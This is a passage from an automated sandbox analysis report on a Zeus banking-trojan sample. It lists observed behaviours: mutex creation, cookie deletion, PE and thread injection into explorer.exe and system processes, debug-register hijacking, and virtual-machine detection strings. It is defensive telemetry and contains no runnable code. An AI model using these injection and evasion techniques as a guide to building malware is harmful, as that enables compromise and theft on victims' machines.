Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-28D1-65C6E3109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-30D2-65C6FB139684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-7CD1-65C6B7109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-C0D1-65C60B109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{CF5A2878-98DD-76E9-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-54D6-65C69F179684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-F8DD-65C6331C9684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{C3B6FF42-4FE7-7A05-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-9CD2-65C657139684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-80D3-65C64B129684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-C0DE-65C60B1F9684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-ACD8-65C667199684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-10D4-65C6DB159684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-F0D2-65C63B139684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-98D7-65C653169684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-A8D2-65C663139684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-38DC-65C6F31D9684}
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{33EF092D-B988-8A5C-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-ACD4-65C667159684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-50D7-65C69B169684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-D8D1-65C613109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{3CF593A4-2301-8546-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-FCD1-65C637109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-20D4-65C6EB159684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-64D1-65C6AF109684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-D0DE-65C61B1F9684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-54D4-65C69F159684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-04DF-65C6CF1E9684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-F8D3-65C633129684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-44D7-65C68F169684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-70D3-65C6BB129684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-4CD0-65C687119684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{C3B6FF43-4FE6-7A05-676C-E42BACAD1769}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{89F62C66-9CC3-3045-676C-E42BACAD1769}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-0CD2-65C6C7139684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{A2504954-F9F1-1BE3-676C-E42BACAD1769}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-FCD5-65C637149684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-98D3-65C653129684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{2BF62CF3-9C56-9245-676C-E42BACAD1769}
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-1CDF-65C6D71E9684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-94D7-65C65F169684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-6CD1-65C6A7109684}
Source: C:\Windows\System32\taskhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-00DE-65C6CB1F9684}
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{822A19E9-A94C-3B99-B8D5-65C673149684}
Source: C:\Windows\System32\cmd.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}

Deletes Internet Explorer cookies via registry

Show sources

Source: C:\Windows\System32\taskhost.exe

Registry key value created / modified: HKEY_USERS\Software\Microsoft\Internet Explorer\Privacy

Enables security privileges

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Process token adjusted: Security

Reads the hosts file

Show sources

Source: C:\Windows\System32\taskhost.exe

File read: C:\Windows\System32\drivers\etc\hosts

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C69AA InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_003C69AA

Allocates memory in foreign processes

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 30000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 1190000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\explorer.exe base: 1B50000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\System32\conhost.exe base: B0000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\System32\taskhost.exe base: 500000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\System32\WinSAT.exe base: 1D10000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1A0000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory allocated: unknown base: 3B0000 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 630000 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory allocated: unknown base: 3B0000 protect: page execute and read and write

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 1190000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B2BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B2000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B2C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B30BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B3000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 11B30C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B50000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B72BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B72000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B72C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B730BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B73000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\explorer.exe base: 1B730C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: B0000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D2BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D2000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D2C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D30BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D3000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: D30C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 500000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 522BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 522000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 522C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 5230BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 523000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\taskhost.exe base: 5230C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D10000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D32BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D32000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D32C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D330BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D33000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\WinSAT.exe base: 1D330C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1A0000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C2BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C2000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C2C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C30BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C3000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: C:\Windows\System32\conhost.exe base: 1C30C0 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3B0000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D2BF8 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D2000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D2C0C protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D30BC protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D3000 protect: page execute and read and write
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory protected: unknown base: 3D30C0 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 630000 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 652BF8 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 652000 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 652C0C protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 6530BC protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 653000 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: C:\Windows\System32\dwm.exe base: 6530C0 protect: page execute and read and write
Source: C:\Windows\System32\taskhost.exe	Memory protected: unknown base: 3B0000 protect: page execute and read and write

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\System32\taskhost.exe EIP: 11A2CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\explorer.exe EIP: 1B62CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\System32\conhost.exe EIP: C2CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\System32\taskhost.exe EIP: 512CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\System32\WinSAT.exe EIP: 1D22CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: C:\Windows\System32\conhost.exe EIP: 1B2CF7
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Threat created: unknown EIP: 3C2CF7
Source: C:\Windows\System32\taskhost.exe	Threat created: C:\Windows\System32\dwm.exe EIP: 642CF7

Injects a PE file into a foreign processes

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 30000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1190000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B50000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: B0000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 500000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D10000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A0000 value starts with: 4D5A
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 630000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: PID: 2032 base: 1B50000 value: 4D
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: PID: 2032 base: 1B72BF8 value: 00
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: PID: 2032 base: 1B72C0C value: 00
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: PID: 2032 base: 1B730BC value: 98
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: PID: 2032 base: 1B730C0 value: 4C

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Thread register set: target process: 4008

Sets debug register (to hijack the execution of another thread)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Thread register set: 4008 7734C63D

Writes to foreign memory regions

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 30000
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 52BF8
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 52C0C
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 530BC
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Memory written: C:\Windows\System32\cmd.exe base: 530C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 1190000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 11B2BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 11B2C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 11B30BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 11B30C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B50000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B72BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B72C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B730BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\explorer.exe base: 1B730C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: B0000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: D2BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: D2C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: D30BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: D30C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 500000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 522BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 522C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 5230BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\taskhost.exe base: 5230C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D10000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D32BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D32C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D330BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\WinSAT.exe base: 1D330C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A0000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C2BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C2C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C30BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C30C0
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3B0000
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3D2BF8
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3D2C0C
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3D30BC
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Memory written: unknown base: 3D30C0
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 630000
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 652BF8
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 652C0C
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 6530BC
Source: C:\Windows\System32\taskhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 6530C0

Anti Debugging and Sandbox Evasion:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003CC5CA LdrGetDllHandle,EnterCriticalSection,lstrcmpiW,lstrcmpiW,lstrcmpiW,LeaveCriticalSection,

0_2_003CC5CA

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Show sources

Source: C:\Windows\System32\cmd.exe

Code function: 10_2_00047BF7 VirtualProtectEx 000000FF,0003C160,0000001E,00052360,00052360,?,?,?,?,0003BE97,6A000523,00000000,?,?,0003C160,00052360

10_2_00047BF7

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C70A1 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,FreeLibrary,

0_2_003C70A1

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C20C4 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,HeapCreate,GetProcessHeap,InitializeCriticalSection,WSAStartup,CreateEventW,GetLengthSid,GetCurrentProcessId,

0_2_003C20C4

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\taskhost.exe TID: 3760	Thread sleep time: -60000ms >= -60000ms
Source: C:\Windows\System32\taskhost.exe TID: 3760	Thread sleep time: -60000ms >= -60000ms

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

Code function: 0_2_003C8AE4 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,

0_2_003C8AE4

Queries a list of all running processes

Show sources

Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe

Process information queried: ProcessInformation

May tried to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Show sources

Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	Binary or memory string: VBoxGuest.cat
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	Binary or memory string: VBoxGuest.sys
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	Binary or memory string: VBoxMouse.cat
Source: TempWinSAT-Disk-2015-02-05-14-57-01-05.tmp.dr	Binary or memory string: VBoxGuest.inf

Queries disk information (often used to detect virtual machines)

Show sources

Source: C:\Windows\System32\WinSAT.exe

File opened: PhysicalDrive0

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOOPENFILEERRORBOX
Source: C:\Users\admin\AppData\Roaming\Oddyn\madog.exe	Process information set: NOALIGNMENTFAULTEXCEPT and NOGPFAULTERRORBOX and NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Zeus_binary_4d08934bd040ed25dfa46542e396cb05.exe

